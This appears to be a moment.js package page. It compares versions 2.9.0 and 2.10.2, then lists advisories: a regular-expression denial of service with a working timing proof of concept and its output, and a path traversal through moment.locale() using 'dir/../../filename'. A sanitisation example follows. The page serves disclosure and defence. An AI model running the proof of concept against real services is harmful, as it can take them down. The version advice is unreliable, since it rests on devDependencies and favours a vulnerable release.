Moment.js saw a notable update between versions 2.9.0 and 2.10.2, refining its date parsing, validation, manipulation and display. Both versions keep the same core functionality and target developers who need a robust JavaScript date library. The devDependencies highlight the key differences: version 2.10.2 replaces nodeunit and karma-nodeunit with qunit, karma-qunit and es6-promise, which suggests the test suite moved to QUnit and gained an ES6 Promise polyfill, possibly for asynchronous operations or broader compatibility with modern JavaScript environments. Version 2.10.2 also adds grunt-contrib-copy, indicating changes to the build process, potentially to handle file-copying tasks more efficiently. The release dates are roughly three months apart.
Developers choosing between these versions should consider which testing framework aligns with their project: teams using QUnit may prefer 2.10.2, while those already invested in Nodeunit may find 2.9.0 the simpler choice. That said, the es6-promise dependency and the updated build process make 2.10.2 the more compelling upgrade for projects that want modern JavaScript features and a streamlined development workflow. Both versions remain useful depending on project needs and environment. Check the official changelog for complete details on breaking changes, bug fixes and other feature additions before deciding.
All vulnerabilities affecting version 2.10.2 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');

// Builds a string of len+1 copies of chr. The loop counter `i` is not
// declared with `var`, so it is a global shared with the outer loop below;
// that is why COUNT in the output below grows by 10001 rather than 10000.
var genstr = function (len, chr) {
    var result = "";
    for (i = 0; i <= len; i++) {
        result = result + chr;
    }
    return result;
};

// Feed ever longer strings of '-' followed by '1's into moment.duration()
// and time each call; the time grows super-linearly with the input length.
for (i = 20000; i <= 10000000; i = i + 10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1');
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str);
    var end = process.hrtime(start); // [seconds, nanoseconds] elapsed
    console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low-severity regular expression denial of service when parsing dates from strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability affects npm (server-side) users of moment.js, especially where a user-provided locale string (e.g. fr) is passed directly to moment.locale() to switch the locale.
The problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up to and including 2.29.1).
Sanitize the user-provided locale name before passing it to moment.js.
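One way to do that sanitisation, as an added example that is not part of moment.js or of the advisory: the locale name is checked against a strict pattern and then against the list of installed locales, so nothing resembling a path can reach moment.locale(). It assumes the caller passes moment.locales() as the installed list; the length bound for the earlier duration ReDoS is an assumed limit, and moment itself is not loaded here so the checks run stand-alone.

```javascript
// Locale identifiers that moment ships are short, lower-case, letters and
// digits separated by '-' (e.g. "fr", "en-gb", "zh-cn", "x-pseudo").
// Anything containing '/', '\', '.' or upper case fails this pattern.
const LOCALE_RE = /^[a-z]{1,3}(?:-[a-z0-9]{1,8})*$/;

function isSafeLocaleName(name) {
  return typeof name === 'string' && name.length <= 20 && LOCALE_RE.test(name);
}

// Returns the locale to switch to, or `fallback` when the input is malformed
// or not installed. The raw user input is never forwarded to moment.locale().
// `installedLocales` is expected to come from moment.locales() (assumption).
function selectLocale(userInput, installedLocales, fallback = 'en') {
  if (!isSafeLocaleName(userInput)) return fallback;
  return installedLocales.includes(userInput) ? userInput : fallback;
}

// Companion check for the moment.duration() ReDoS described above: bound the
// input length before the parser sees it. 100 characters is an assumed
// limit; legitimate duration strings are far shorter than that.
function boundedDurationInput(str, maxLen = 100) {
  if (typeof str !== 'string' || str.length > maxLen) return null;
  return str;
}

// Constructed demo input (a request-style object, not real traffic).
function demo() {
  const installed = ['en', 'fr', 'en-gb', 'zh-cn'];      // stands in for moment.locales()
  const requests = ['fr', 'dir/../../filename', 'FR', 'xx', undefined];
  return requests.map((q) => selectLocale(q, installed));
}

// Intended use (not executed here, since moment is not loaded):
//   moment.locale(selectLocale(req.query.locale, moment.locales()));
//   const d = boundedDurationInput(req.query.duration);
//   if (d !== null) moment.duration(d);
```

demo() returns ['fr', 'en', 'en', 'en', 'en']: only the installed, well-formed name passes, everything else falls back to 'en'.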